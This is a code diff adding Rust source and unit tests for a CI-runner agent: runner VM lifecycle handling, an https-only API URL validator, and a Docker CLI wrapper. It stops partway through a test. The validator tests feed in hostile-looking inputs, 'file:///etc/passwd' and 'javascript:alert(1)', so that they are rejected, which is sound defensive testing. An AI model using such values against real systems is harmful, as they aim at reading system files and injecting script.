+use serde_json::json;
+use std::collections::HashMap;
+use std::env;
+use std::sync::Arc;
+use std::time::Duration;
+use tokio::sync::Semaphore;
+use tokio::task::JoinSet;
+use uuid::Uuid;
+
+// Client for interacting with the CiRun API
+pub struct CirunClient {
+    client: Client,
+    base_url: String,
+    api_token: String,
+    agent: AgentInfo,
+    pub retry_tracker: HashMap<String, u32>,
+    /// None means no limit, Some(n) means max n concurrent VMs
+    max_vms: Option<u32>,
+    /// Per-runner executor binding, learned at provision time. Cleanup/delete
+    /// paths consult this map instead of guessing from env vars.
+    /// Mutex (not just inner map) because lookups happen behind `&self` and
+    /// inserts behind `&mut self` from the main loop.
+    pub runner_executors: std::sync::Mutex<HashMap<String, crate::executor::ExecutorKind>>,
+    /// Names of runners currently being provisioned by this agent. Used to
+    /// suppress racing delete requests: if the api sends a
+    /// `runners_to_delete` for a name still in `in_flight`, the agent ignores
+    /// it instead of killing the half-built VM mid-spawn.
+    pub in_flight: std::sync::Mutex<std::collections::HashSet<String>>,
+    /// Executors available on this host, probed once at startup. `Arc` so it
+    /// can be cheaply cloned into per-runner provision tasks.
+    pub registry: Arc<crate::executor::registry::Registry>,
+}
+
+impl CirunClient {
+    pub fn new(base_url: &str, api_token: &str, agent: AgentInfo, max_vms: Option<u32>) -> Self {
+        let client = Client::builder()
+            .timeout(Duration::from_secs(15))
+            .connect_timeout(Duration::from_secs(10))
+            .build()
+            .expect("Failed to build HTTP client");
+
+        CirunClient {
+            client,
+            base_url: base_url.to_string(),
+            api_token: api_token.to_string(),
+            agent,
+            retry_tracker: HashMap::new(),
+            max_vms,
+            runner_executors: std::sync::Mutex::new(HashMap::new()),
+            in_flight: std::sync::Mutex::new(std::collections::HashSet::new()),
+            registry: Arc::new(crate::executor::registry::Registry::probe()),
+        }
+    }
+
+    /// Best-effort lookup of which executor owns a runner. Falls back to the
+    /// OS-default when the map has no entry (e.g. agent restarted between
+    /// provision and cleanup, or runner was created by an older agent build).
+    /// `seed_runner_executors_from_registry` should be called at startup to
+    /// reduce the chance of the fallback firing on a fresh process.
+    fn executor_for_runner(&self, runner_name: &str) -> crate::executor::ExecutorKind {
+        if let Ok(map) = self.runner_executors.lock() {
+            if let Some(k) = map.get(runner_name) {
+                return *k;
+            }
+        }
+        // Log the fallback so an operator can spot it in journald — silent
+        // mis-routing was a real risk per the round-1 review.
+        warn!(
+            "runner '{}' has no executor binding; falling back to OS default",
+            runner_name
+        );
+        match env::consts::OS {
+            "macos" => crate::executor::ExecutorKind::Lume,
+            _ => crate::executor::ExecutorKind::Meda,
+        }
+    }
+
+    /// Populate `runner_executors` from the registry's view of the world.
+    /// Call at startup so an agent restart with in-flight runners doesn't
+    /// silently mis-route deletes to the wrong executor. Best-effort: per-
+    /// executor list failures are logged and skipped.
+    pub async fn seed_runner_executors_from_registry(&mut self) {
+        let runners = self.registry.list_all().await;
+        let mut count = 0usize;
+        if let Ok(mut map) = self.runner_executors.lock() {
+            for (kind, runner) in runners {
+                if runner.name.starts_with("cirun-") {
+                    map.insert(runner.name, kind);
+                    count += 1;
+                }
+            }
+        }
+        info!(
+            "Seeded runner_executors map with {} entries from live executors",
+            count
+        );
+    }
+
+    // Helper method to create a request builder with common headers
+    fn create_request(&self, method: reqwest::Method, url: &str) -> reqwest::RequestBuilder {
+        let request_id = Uuid::new_v4().to_string();
+        info!("Creating request with ID: {}", request_id);
+
+        self.client
+            .request(method, url)
+            .header("Authorization", format!("Bearer {}", self.api_token))
+            .header("X-Request-ID", request_id)
+            .header("X-Agent-ID", &self.agent.id)
+    }
+
+    async fn handle_orphaned_runners(&self, response: reqwest::Response) {
+        // Parse response for runners_to_delete (orphaned VMs)
+        match response.json::<ApiResponse>().await {
+            Ok(api_response) => {
+                if !api_response.runners_to_delete.is_empty() {
+                    info!(
+                        "API returned {} orphaned runners to delete from POST",
+                        api_response.runners_to_delete.len()
+                    );
+                    let in_flight = self.in_flight_snapshot();
+                    for runner in &api_response.runners_to_delete {
+                        // Same race-protection as the GET-path delete loop:
+                        // skip orphan-cleanup for runners we are still
+                        // building. cirun api may class a runner as orphan
+                        // before its provision flow has finished here, and
+                        // killing the half-built VM mid-spawn produces the
+                        // "disappeared during settle" error.
+                        if in_flight.contains(&runner.name) {
+                            warn!(
+                                "ignoring SaaS orphan-delete for '{}' — provision in flight on this agent",
+                                runner.name
+                            );
+                            continue;
+                        }
+                        match self.delete_runner(&runner.name).await {
+                            Ok(_) => {
+                                info!("[OK] Successfully deleted orphaned runner: {}", runner.name);
+                            }
+                            Err(e) => {
+                                error!("✘ Failed to delete orphaned runner {}: {}", runner.name, e)
+                            }
+                        }
+                    }
+                }
+            }
+            Err(e) => {
+                info!(
+                    "No runners_to_delete in POST response or parse error: {}",
+                    e
+                );
+            }
+        }
+    }
+
+    pub async fn report_running_vms(&self) {
+        use crate::executor::ExecutorKind;
+        info!("Reporting running VMs to API");
+        let all = self.registry.list_all().await;
+        let vms: Vec<_> = all
+            .into_iter()
+            .filter(|(_, r)| r.name.starts_with("cirun-"))
+            .map(|(k, r)| {
+                let os = match k {
+                    ExecutorKind::Docker | ExecutorKind::Meda => "linux",
+                    ExecutorKind::Lume => "macos",
+                };
+                json!({
+                    "name": r.name,
+                    "os": os,
+                    "cpu": 0,
+                    "memory": 0,
+                    "disk_size": 0,
+                })
+            })
+            .collect();
+
+        let url = format!("{}/agent", self.base_url);
+        match self
+            .create_request(reqwest::Method::POST, &url)
+            .json(&json!({ "agent": self.agent, "vms": vms }))
+            .send()
+            .await
+        {
+            Ok(response) => {
+                info!("API response status: {}", response.status());
+                self.handle_orphaned_runners(response).await;
+            }
+            Err(e) => error!("Failed to send running VMs: {}", e),
+        }
+    }
+
+    async fn delete_runner(&self, runner_name: &str) -> Result<(), Box<dyn std::error::Error>> {
+        let kind = self.executor_for_runner(runner_name);
+        info!(
+            "Attempting to delete runner '{}' via {:?} executor",
+            runner_name, kind
+        );
+        // Binding is intentionally NOT removed on success. The cirun api may
+        // re-request a delete for the same runner across consecutive polling
+        // cycles (POST orphan-list then GET runners_to_delete); dropping the
+        // binding would force the second request through the OS-default
+        // fallback (Lume on macOS / Meda on Linux) which then fails with
+        // "not found" and burns the retry budget. Every executor's `kill` is
+        // idempotent on "already gone", so keeping the binding is safe.
+        self.registry
+            .get(kind)
+            .map_err(|e| -> Box<dyn std::error::Error> {
+                Box::new(std::io::Error::other(e.to_string()))
+            })?
+            .kill(runner_name)
+            .await
+            .map_err(|e| -> Box<dyn std::error::Error> {
+                Box::new(std::io::Error::other(e.to_string()))
+            })
+    }
+
+    /// Get the current retry count for a runner
+    fn get_retry_count(&self, runner_name: &str) -> u32 {
+        *self.retry_tracker.get(runner_name).unwrap_or(&0)
+    }
+
+    /// Increment the retry count for a runner and return the new count
+    pub fn increment_retry(&mut self, runner_name: &str) -> u32 {
+        let count = self
+            .retry_tracker
+            .entry(runner_name.to_string())
+            .or_insert(0);
+        *count += 1;
+        *count
+    }
+
+    /// Clear the retry count for a runner
+    pub fn clear_retry(&mut self, runner_name: &str) {
+        self.retry_tracker.remove(runner_name);
+    }
+
+    /// Check if a runner should be retried based on max_retries
+    fn should_retry(&self, runner_name: &str, max_retries: u32) -> bool {
+        self.get_retry_count(runner_name) < max_retries
+    }
+
+    /// Notify the API that a runner provisioning attempt failed
+    pub async fn notify_provision_failure(&self, runner_name: &str, error: String, attempt: u32) {
+        let url = format!("{}/agent", self.base_url);
+
+        info!(
+            "Notifying API of provisioning failure for {} (attempt {})",
+            runner_name, attempt
+        );
+
+        let request_data = json!({
+            "agent": self.agent,
+            "provision_failure": {
+                "runner_name": runner_name,
+                "error": error,
+                "attempt": attempt,
+            }
+        });
+
+        match self
+            .create_request(reqwest::Method::POST, &url)
+            .json(&request_data)
+            .send()
+            .await
+        {
+            Ok(response) => {
+                if response.status().is_success() {
+                    debug!("Successfully notified API of provisioning failure");
+                } else {
+                    warn!(
+                        "API returned non-success status for failure notification: {}",
+                        response.status()
+                    );
+                }
+            }
+            Err(e) => {
+                warn!("Failed to notify API of provisioning failure: {}", e);
+            }
+        }
+    }
+
+    /// Snapshot of the in-flight provision name set. Held briefly under the
+    /// mutex; callers that need to hold the lock longer should grab the guard
+    /// directly. Returns an empty set if the mutex is poisoned (best-effort).
+    fn in_flight_snapshot(&self) -> std::collections::HashSet<String> {
+        self.in_flight.lock().map(|s| s.clone()).unwrap_or_default()
+    }
+
+    pub async fn manage_runner_lifecycle(
+        &mut self,
+        provision_set: &mut JoinSet<ProvisionResult>,
+        in_flight: &mut std::collections::HashSet<String>,
+    ) -> Result<ApiResponse, Error> {
+        let url = format!("{}/agent", self.base_url);
+        info!("Fetching runner provision/deletion data from: {}", url);
+
+        // `executors` advertises which runtimes this agent can serve, so SaaS
+        // can route by capability instead of host OS. Lets a single Mac host
+        // pick up both linux/docker and macos/lume jobs.
+        let request_data = json!({
+            "agent": self.agent,
+            "executors": self.registry.kind_names(),
+        });
+
+        let response = self
+            .create_request(reqwest::Method::GET, &url)
+            .json(&request_data)
+            .send()
+            .await?;
+
+        info!("Response status: {}", response.status());
+        let json: ApiResponse = response.json().await?;
+
+        // Handle any runners that need deletion
+        if !json.runners_to_delete.is_empty() {
+            info!(
+                "Received {} runners to delete",
+                json.runners_to_delete.len()
+            );
+
+            for runner in &json.runners_to_delete {
+                // Skip delete if this runner is currently being provisioned
+                // by THIS agent. The cirun api occasionally orphan-cleans a
+                // runner before the agent has finished its create flow
+                // (observed 2026-05-15 with meda: VM was created, deleted
+                // mid-spawn, then `inspect` returned 500 → "disappeared
+                // during settle"). The provision flow itself emits
+                // `notify_provision_failure` on real errors, so SaaS will
+                // re-evaluate; ignoring the racing delete keeps the
+                // half-built VM alive long enough to either finish or fail
+                // for a real reason.
+                if in_flight.contains(&runner.name) {
+                    warn!(
+                        "ignoring SaaS delete request for '{}' — provision in flight on this agent",
+                        runner.name
+                    );
+                    continue;
+                }
+                match self.delete_runner(&runner.name).await {
+                    Ok(_) => {
+                        info!("[OK] Successfully deleted runner: {}", runner.name);
+                        self.report_running_vms().await;
+                    }
+
+                    Err(e) => error!("✘ Failed to delete runner {}: {}", runner.name, e),
+                }
+            }
+        }
+
+        // Handle runners that need provisioning
+        if !json.runners_to_provision.is_empty() {
+            info!(
+                "Received {} runners to provision",
+                json.runners_to_provision.len()
+            );
+
+            // First, handle retry-exhausted runners (notify API, skip them)
+            for runner in &json.runners_to_provision {
+                let current_attempts = self.get_retry_count(&runner.name);
+                if !self.should_retry(&runner.name, runner.max_retries) {
+                    warn!(
+                        "Runner '{}' has exceeded max retries ({}/{}). Skipping provisioning.",
+                        runner.name, current_attempts, runner.max_retries
+                    );
+                    self.notify_provision_failure(
+                        &runner.name,
+                        format!("Exceeded max retries ({})", runner.max_retries),
+                        current_attempts,
+                    )
+                    .await;
+                }
+            }
+
+            // Collect eligible runners (not retry-exhausted, not already
+            // in-flight, AND served by an executor we actually have).
+            // The capability filter is the important one: when the api
+            // fans the same runner out to multiple agents, an agent that
+            // can't serve it must drop it silently. Returning a
+            // ProvisionFailure for a capability mismatch causes the api
+            // to mark the runner failed and then issue an orphan-delete
+            // — which can race with the WINNING agent's still-running VM
+            // and tear it down mid-job. Filtering here means the api only
+            // ever hears from agents that can actually do the work.
+            let eligible_runners: Vec<RunnerToProvision> = json
+                .runners_to_provision
+                .iter()
+                .filter(|r| self.should_retry(&r.name, r.max_retries))
+                .filter(|r| {
+                    if in_flight.contains(&r.name) {
+                        info!("Skipping runner '{}' — already in-flight", r.name);
+                        false
+                    } else {
+                        true
+                    }
+                })
+                .filter(|r| {
+                    // OS gate: a runner with `os: linux` must not be claimed
+                    // by a macos agent (and vice-versa), even if both have a
+                    // common executor like docker. Mismatched OS dispatches
+                    // arrive when the api fans out by executor capability
+                    // alone; without this filter the wrong-OS agent would
+                    // attempt provision, fail (image arch mismatch, CPU
+                    // bounds, etc.), and the racing failure notification
+                    // would cause an orphan-delete on the agent that did
+                    // accept the work.
+                    if !r.os.eq_ignore_ascii_case(&self.agent.os) {
+                        debug!(
+                            "Skipping runner '{}' — runner.os={} does not match agent.os={}",
+                            r.name, r.os, self.agent.os
+                        );
+                        return false;
+                    }
+                    let kind = match crate::executor::resolve_executor_kind(
+                        r.executor.as_deref(),
+                        r.extra_config.as_ref(),
+                        &r.os,
+                    ) {
+                        Ok(k) => k,
+                        Err(_) => return true, // let provision flow surface the misconfig
+                    };
+                    if self.registry.get(kind).is_ok() {
+                        true
+                    } else {
+                        debug!(
+                            "Skipping runner '{}' — executor {:?} not available on this host",
+                            r.name, kind
+                        );
+                        false
+                    }
+                })
+                .cloned()
+                .collect();
+
+            if !eligible_runners.is_empty() {
+                // Calculate available slots based on VM capacity
+                let available_slots = if let Some(max_vms) = self.max_vms {
+                    let running_count = self.registry.total_count_running().await;
+                    let slots = (max_vms as usize).saturating_sub(running_count);
+                    info!(
+                        "VM capacity: {}/{} running, {} slots available, {} runners requested",
+                        running_count,
+                        max_vms,
+                        slots,
+                        eligible_runners.len()
+                    );
+                    if slots == 0 {
+                        info!("No VM slots available. Runners will be picked up on next poll.");
+                    }
+                    slots
+                } else {
+                    eligible_runners.len()
+                };
+
+                if available_slots > 0 {
+                    // Cap runners to available slots
+                    let runners_to_spawn: Vec<RunnerToProvision> =
+                        eligible_runners.into_iter().take(available_slots).collect();
+
+                    info!(
+                        "Spawning {} runners in parallel (max concurrency: {})",
+                        runners_to_spawn.len(),
+                        available_slots
+                    );
+
+                    let semaphore = Arc::new(Semaphore::new(available_slots));
+
+                    for runner in runners_to_spawn {
+                        in_flight.insert(runner.name.clone());
+                        // Mirror into self.in_flight so the orphan-delete
+                        // path (handle_orphaned_runners, called from the
+                        // POST report-running-vms response) can also see
+                        // it without taking the local arg.
+                        if let Ok(mut s) = self.in_flight.lock() {
+                            s.insert(runner.name.clone());
+                        }
+                        let sem = semaphore.clone();
+                        let reg = Arc::clone(&self.registry);
+                        provision_set.spawn(provision_single_runner(runner, sem, reg));
+                    }
+
+                    info!(
+                        "Spawned provisioning tasks. Total in-flight: {}",
+                        provision_set.len()
+                    );
+                }
+            }
+        }
+
+        Ok(json)
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::executor::{
+        registry::Registry, Executor, ExecutorKind, OwnedRunner, ProvisionError, RunnerSpec,
+        RunnerState,
+    };
+    use async_trait::async_trait;
+    use std::collections::HashMap;
+    use std::sync::Mutex as StdMutex;
+
+    /// Fake executor that records every kill() invocation and always reports
+    /// success. Used to drive `delete_runner` without touching docker/lume.
+    struct RecordingExecutor {
+        killed: StdMutex<Vec<String>>,
+    }
+
+    impl RecordingExecutor {
+        fn new() -> Self {
+            Self {
+                killed: StdMutex::new(Vec::new()),
+            }
+        }
+    }
+
+    #[async_trait]
+    impl Executor for RecordingExecutor {
+        fn settle_timeout(&self) -> Duration {
+            Duration::from_secs(1)
+        }
+        fn validate(&self, _spec: &RunnerSpec) -> Result<(), ProvisionError> {
+            Ok(())
+        }
+        async fn inspect(&self, _name: &str) -> Result<RunnerState, ProvisionError> {
+            Ok(RunnerState::Absent)
+        }
+        async fn spawn(&self, _spec: &RunnerSpec) -> Result<(), ProvisionError> {
+            Ok(())
+        }
+        async fn kill(&self, name: &str) -> Result<(), ProvisionError> {
+            self.killed.lock().unwrap().push(name.to_string());
+            Ok(())
+        }
+        async fn list_owned(&self) -> Result<Vec<OwnedRunner>, ProvisionError> {
+            Ok(Vec::new())
+        }
+    }
+
+    fn test_client(registry: Arc<Registry>) -> CirunClient {
+        CirunClient {
+            client: Client::builder().build().unwrap(),
+            base_url: "https://example.invalid".to_string(),
+            api_token: "tok".to_string(),
+            agent: AgentInfo {
+                id: "agent-x".into(),
+                hostname: "h".into(),
+                os: "linux".into(),
+                arch: "x86_64".into(),
+            },
+            retry_tracker: HashMap::new(),
+            max_vms: None,
+            runner_executors: std::sync::Mutex::new(HashMap::new()),
+            in_flight: std::sync::Mutex::new(std::collections::HashSet::new()),
+            registry,
+        }
+    }
+
+    /// Regression test for the binding-loss bug observed in prod 2026-05-15:
+    /// a POST-orphan-delete succeeded via Docker, but the binding was removed
+    /// from `runner_executors`. The very next GET cycle re-requested the same
+    /// delete; with no binding the routing fell back to the OS-default (Lume
+    /// on macOS), which then hit "VM not found" and burned the retry budget.
+    ///
+    /// Successful deletes must preserve the binding so that idempotent re-
+    /// requests from the api route to the same executor — where `kill()` is
+    /// already a no-op when the runner is already gone.
+    #[tokio::test]
+    async fn delete_runner_preserves_binding_for_idempotent_retries() {
+        let mut execs: HashMap<ExecutorKind, Arc<dyn Executor>> = HashMap::new();
+        execs.insert(ExecutorKind::Docker, Arc::new(RecordingExecutor::new()));
+        let registry = Arc::new(Registry::from_executors(execs));
+        let client = test_client(registry);
+
+        client
+            .runner_executors
+            .lock()
+            .unwrap()
+            .insert("cirun-r1".into(), ExecutorKind::Docker);
+
+        client.delete_runner("cirun-r1").await.expect("delete ok");
+
+        let map = client.runner_executors.lock().unwrap();
+        assert_eq!(
+            map.get("cirun-r1"),
+            Some(&ExecutorKind::Docker),
+            "binding must persist after a successful delete so SaaS retries do not fall back to the OS-default executor"
+        );
+    }
+
+    /// Sanity: looking up a runner that was never bound falls back to the
+    /// OS-default and emits the fallback warning. Locks in the historical
+    /// behaviour the regression test above depends on.
+    #[test]
+    fn unbound_runner_routes_to_os_default() {
+        let registry = Arc::new(Registry::from_executors(HashMap::new()));
+        let client = test_client(registry);
+        let kind = client.executor_for_runner("nope");
+        let expected = match env::consts::OS {
+            "macos" => ExecutorKind::Lume,
+            _ => ExecutorKind::Meda,
+        };
+        assert_eq!(kind, expected);
+    }
+}

--- a/src/config.rs
+++ b/src/config.rs
@@ -1,0 +1,90 @@
+//! Agent boot-time configuration knobs.
+//!
+//! Everything here is a pure function over env vars + defaults so it can be
+//! unit-tested without spinning the agent. `main.rs` should call into here
+//! and never re-parse env directly.
+
+use std::env;
+
+const DEFAULT_API_URL: &str = "https://api.cirun.io/api/v1";
+
+#[derive(Debug, thiserror::Error)]
+pub enum ConfigError {
+    #[error("invalid CIRUN_API_URL '{0}': {1}")]
+    InvalidApiUrl(String, String),
+    #[error(
+        "refusing insecure CIRUN_API_URL '{0}' — scheme must be https. \
+         Set CIRUN_AGENT_INSECURE_HTTP=1 to allow http (dev only)."
+    )]
+    InsecureScheme(String),
+}
+
+/// Resolve and validate the cirun api base URL. Reads `CIRUN_API_URL` (defaults
+/// to production https), then enforces an https scheme unless
+/// `CIRUN_AGENT_INSECURE_HTTP=1` is set (local-dev escape hatch). Returns the
+/// canonical url string the rest of the agent should use.
+///
+/// Why: the bearer token + the verbatim `provision_script` flow over this URL.
+/// An accidental `http://...` setting would leak the token and let any
+/// on-path attacker hand the agent arbitrary code to run as root.
+pub fn resolve_api_url() -> Result<String, ConfigError> {
+    let raw = env::var("CIRUN_API_URL").unwrap_or_else(|_| DEFAULT_API_URL.to_string());
+    let allow_http = env::var("CIRUN_AGENT_INSECURE_HTTP")
+        .map(|v| v == "1" || v.eq_ignore_ascii_case("true"))
+        .unwrap_or(false);
+    validate_api_url(&raw, allow_http).map(|_| raw)
+}
+
+fn validate_api_url(raw: &str, allow_http: bool) -> Result<(), ConfigError> {
+    let parsed = url::Url::parse(raw)
+        .map_err(|e| ConfigError::InvalidApiUrl(raw.to_string(), e.to_string()))?;
+    match parsed.scheme() {
+        "https" => Ok(()),
+        "http" if allow_http => Ok(()),
+        "http" => Err(ConfigError::InsecureScheme(raw.to_string())),
+        other => Err(ConfigError::InvalidApiUrl(
+            raw.to_string(),
+            format!("unsupported scheme '{other}'"),
+        )),
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn https_is_accepted() {
+        assert!(validate_api_url("https://api.cirun.io/api/v1", false).is_ok());
+        assert!(validate_api_url("https://localhost:7777", false).is_ok());
+    }
+
+    #[test]
+    fn plain_http_is_rejected_by_default() {
+        let err = validate_api_url("http://localhost:7777", false).unwrap_err();
+        assert!(matches!(err, ConfigError::InsecureScheme(_)));
+    }
+
+    #[test]
+    fn http_is_allowed_with_escape_hatch() {
+        assert!(validate_api_url("http://localhost:7777", true).is_ok());
+    }
+
+    #[test]
+    fn other_schemes_are_rejected() {
+        for s in [
+            "ftp://api.cirun.io",
+            "file:///etc/passwd",
+            "javascript:alert(1)",
+        ] {
+            let err = validate_api_url(s, true).unwrap_err();
+            assert!(matches!(err, ConfigError::InvalidApiUrl(_, _)));
+        }
+    }
+
+    #[test]
+    fn malformed_url_is_rejected() {
+        let err = validate_api_url("not a url", true).unwrap_err();
+        assert!(matches!(err, ConfigError::InvalidApiUrl(_, _)));
+    }
+}

--- a/src/docker/client.rs
+++ b/src/docker/client.rs
@@ -1,0 +1,392 @@
+use std::process::{Command, Stdio};
+
+use log::{debug, info};
+
+use crate::docker::errors::DockerError;
+use crate::docker::models::{ContainerCommand, ContainerInfo, GpuSelection, RunnerContainerSpec};
+
+const DEFAULT_DOCKER_BIN: &str = "docker";
+
+/// Thin wrapper around the `docker` CLI.
+///
+/// Shells out instead of using bollard to avoid pulling in another dependency
+/// for the MVP. The argv it produces is deterministic and unit-tested.
+pub struct DockerClient {
+    bin: String,
+}
+
+impl Default for DockerClient {
+    fn default() -> Self {
+        Self {
+            bin: DEFAULT_DOCKER_BIN.to_string(),
+        }
+    }
+}
+
+impl DockerClient {
+    pub fn new() -> Self {
+        Self::default()
+    }
+
+    #[cfg(test)]
+    pub fn with_bin(bin: impl Into<String>) -> Self {
+        Self { bin: bin.into() }
+    }
+
+    /// Build the argv for `docker run` from a runner container spec.
+    /// Public so it can be unit-tested without exec'ing docker.
+    pub fn build_run_argv(spec: &RunnerContainerSpec) -> Vec<String> {
+        let mut argv: Vec<String> = vec!["run".into(), "-d".into(), "--restart=no".into()];
+
+        argv.push("--name".into());
+        argv.push(spec.name.clone());
+
+        // `cirun.runner=true` is how `list_owned` finds our containers. Every
+        // cirun-spawned container MUST carry it — without it the runner is
+        // invisible to the registry, max_vms cap, and orphan cleanup.
+        argv.push("--label".into());
+        argv.push("cirun.runner=true".into());
+
+        match spec.gpus {
+            GpuSelection::All => {
+                argv.push("--gpus".into());
+                argv.push("all".into());
+            }
+            GpuSelection::Count(n) => {
+                argv.push("--gpus".into());
+                argv.push(n.to_string());
+            }
+            GpuSelection::None => {}
+        }
+
+        if let Some(c) = spec.cpus {
+            argv.push("--cpus".into());
+            argv.push(c.to_string());
+        }
+        if let Some(m) = spec.memory_gb {
+            argv.push("--memory".into());
+            argv.push(format!("{}g", m));
+        }
+
+        for (k, v) in &spec.env {
+            argv.push("-e".into());
+            argv.push(format!("{}={}", k, v));
+        }
+
+        argv.push(spec.image.clone());
+
+        match &spec.command {
+            ContainerCommand::Script(s) => {
+                argv.push("bash".into());
+                argv.push("-lc".into());
+                argv.push(s.clone());
+            }
+            ContainerCommand::Argv(a) => {
+                argv.extend(a.iter().cloned());
+            }
+        }
+
+        argv
+    }
+
+    /// Run a runner container detached. Returns the container ID on success.
+    pub fn run_runner(&self, spec: &RunnerContainerSpec) -> Result<String, DockerError> {
+        let argv = Self::build_run_argv(spec);
+        debug!("docker {}", argv.join(" "));
+        let out = Command::new(&self.bin).args(&argv).output()?;
+        if !out.status.success() {
+            return Err(DockerError::CommandFailed {
+                code: out.status.code(),
+                stderr: String::from_utf8_lossy(&out.stderr).into_owned(),
+            });
+        }
+        let id = String::from_utf8_lossy(&out.stdout).trim().to_string();
+        info!(
+            "Started container {} (id={})",
+            spec.name,
+            &id[..id.len().min(12)]
+        );
+        Ok(id)
+    }
+
+    pub fn stop_and_remove(&self, name: &str) -> Result<(), DockerError> {
+        // `docker rm -f` stops+removes; ignore the "no such container" case.
+        // `--` argv separator prevents a `-flag`-shaped name being parsed as
+        // an option (defence-in-depth — `DockerExecutor::validate` rejects
+        // such names upstream).
+        let out = Command::new(&self.bin)
+            .args(["rm", "-f", "--", name])
+            .output()?;
+        if !out.status.success() {
+            let stderr = String::from_utf8_lossy(&out.stderr);
+            // docker-ce on Linux emits lowercase ("error: no such container")
+            // whereas Docker Desktop emits capitalised. Reuse the executor's
+            // case-insensitive classifier so both paths agree.
+            if crate::executor::docker::is_docker_not_found(&stderr) {
+                return Ok(());
+            }
+            return Err(DockerError::CommandFailed {
+                code: out.status.code(),
+                stderr: stderr.into_owned(),
+            });
+        }
+        Ok(())
+    }
+
+    pub fn list_runner_containers(&self, label: &str) -> Result<Vec<ContainerInfo>, DockerError> {
+        let out = Command::new(&self.bin)
+            .args([
+                "ps",
+                "-a",
+                "--filter",
+                &format!("label={}", label),
+                "--format",
+                "{{.Names}}\t{{.State}}",
+            ])
+            .output()?;
+        if !out.status.success() {
+            return Err(DockerError::CommandFailed {
+                code: out.status.code(),
+                stderr: String::from_utf8_lossy(&out.stderr).into_owned(),
+            });
+        }
+        let mut infos = Vec::new();
+        for line in String::from_utf8_lossy(&out.stdout).lines() {
+            let mut parts = line.splitn(2, '\t');
+            let name = parts.next().unwrap_or("").trim();
+            let state = parts.next().unwrap_or("").trim();
+            if name.is_empty() {
+                continue;
+            }
+            infos.push(ContainerInfo {
+                name: name.to_string(),
+                state: state.to_string(),
+            });
+        }
+        Ok(infos)
+    }
+
+    /// Verify the docker daemon is reachable and report `docker version` output.
+    pub fn ping(&self) -> Result<String, DockerError> {
+        let out = Command::new(&self.bin)
+            .args(["version", "--format", "{{.Server.Version}}"])
+            .stdin(Stdio::null())
+            .output()?;
+        if !out.status.success() {
+            return Err(DockerError::CommandFailed {
+                code: out.status.code(),
+                stderr: String::from_utf8_lossy(&out.stderr).into_owned(),
+            });
+        }
+        Ok(String::from_utf8_lossy(&out.stdout).trim().to_string())
+    }
+
+    /// Run `docker run --rm --gpus all <image> nvidia-smi` and return stdout.
+    /// Used by the `--docker-smoke-test` mode to validate GPU passthrough into a container.
+    pub fn smoke_test_gpu(&self, image: &str) -> Result<String, DockerError> {
+        let out = Command::new(&self.bin)
+            .args(["run", "--rm", "--gpus", "all", image, "nvidia-smi"])
+            .output()?;
+        if !out.status.success() {
+            return Err(DockerError::CommandFailed {
+                code: out.status.code(),
+                stderr: String::from_utf8_lossy(&out.stderr).into_owned(),
+            });
+        }
+        Ok(String::from_utf8_lossy(&out.stdout).into_owned())
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn spec(
+        name: &str,
+        image: &str,
+        gpus: GpuSelection,
+        cmd: ContainerCommand,
+    ) -> RunnerContainerSpec {
+        RunnerContainerSpec {
+            name: name.into(),
+            image: image.into(),
+            gpus,
+            cpus: None,
+            memory_gb: None,
+            env: vec![],
+            command: cmd,
+        }
+    }
+
+    #[test]
+    fn run_argv_basic_no_gpu() {
+        let s = spec(
+            "r1",
+            "ubuntu:24.04",
+            GpuSelection::None,
+            ContainerCommand::Argv(vec!["echo".into(), "hi".into()]),
+        );
+        let argv = DockerClient::build_run_argv(&s);
+        assert_eq!(
+            argv,
+            vec![
+                "run",
+                "-d",
+                "--restart=no",
+                "--name",
+                "r1",
+                "--label",
+                "cirun.runner=true",
+                "ubuntu:24.04",
+                "echo",
+                "hi"
+            ]
+        );
+    }
+
+    /// Every cirun-spawned container MUST carry `cirun.runner=true` — the
+    /// agent's `list_owned` filters by this label, so without it docker
+    /// runners are invisible to the registry, the max_vms cap, and the
+    /// orphan-cleanup path.
+    #[test]
+    fn run_argv_always_stamps_cirun_runner_label() {
+        for gpus in [
+            GpuSelection::None,
+            GpuSelection::All,
+            GpuSelection::Count(2),
+        ] {
+            let s = spec(
+                "r",
+                "img",
+                gpus.clone(),
+                ContainerCommand::Argv(vec!["true".into()]),
+            );
+            let argv = DockerClient::build_run_argv(&s);
+            assert!(
+                argv.windows(2)
+                    .any(|w| w == ["--label", "cirun.runner=true"]),
+                "missing --label cirun.runner=true for gpus={:?}: {:?}",
+                gpus,
+                argv
+            );
+        }
+    }
+
+    #[test]
+    fn run_argv_with_gpu_all_includes_flag() {
+        let s = spec(
+            "r-gpu",
+            "nvidia/cuda:12.4.0-base-ubuntu22.04",
+            GpuSelection::All,
+            ContainerCommand::Argv(vec!["nvidia-smi".into()]),
+        );
+        let argv = DockerClient::build_run_argv(&s);
+        assert!(
+            argv.windows(2).any(|w| w == ["--gpus", "all"]),
+            "expected --gpus all in argv, got {:?}",
+            argv
+        );
+    }
+
+    #[test]
+    fn run_argv_with_gpu_count_emits_number() {
+        let s = spec(
+            "r-gpu-2",
+            "nvidia/cuda:12.4.0-base-ubuntu22.04",
+            GpuSelection::Count(2),
+            ContainerCommand::Argv(vec!["nvidia-smi".into()]),
+        );
+        let argv = DockerClient::build_run_argv(&s);
+        assert!(
+            argv.windows(2).any(|w| w == ["--gpus", "2"]),
+            "expected --gpus 2 in argv, got {:?}",
+            argv
+        );
+    }
+
+    #[test]
+    fn run_argv_script_uses_bash_lc() {
+        let s = spec(
+            "r-script",
+            "ubuntu:24.04",
+            GpuSelection::None,
+            ContainerCommand::Script("echo $FOO && nvidia-smi".into()),
+        );
+        let argv = DockerClient::build_run_argv(&s);
+        let tail = &argv[argv.len() - 3..];
+        assert_eq!(tail, ["bash", "-lc", "echo $FOO && nvidia-smi"]);
+    }
+
+    #[test]
+    fn run_argv_env_vars_are_passed_with_dash_e() {
+        let mut s = spec(
+            "r-env",
+            "ubuntu:24.04",
+            GpuSelection::None,
+            ContainerCommand::Script("env".into()),
+        );
+        s.env = vec![
+            ("RUNNER_TOKEN".into(), "abc".into()),
+            ("REPO_URL".into(), "https://github.com/o/r".into()),
+        ];
+        let argv = DockerClient::build_run_argv(&s);
+        let mut pairs: Vec<(String, String)> = Vec::new();
+        let mut i = 0;
+        while i < argv.len() {
+            if argv[i] == "-e" {
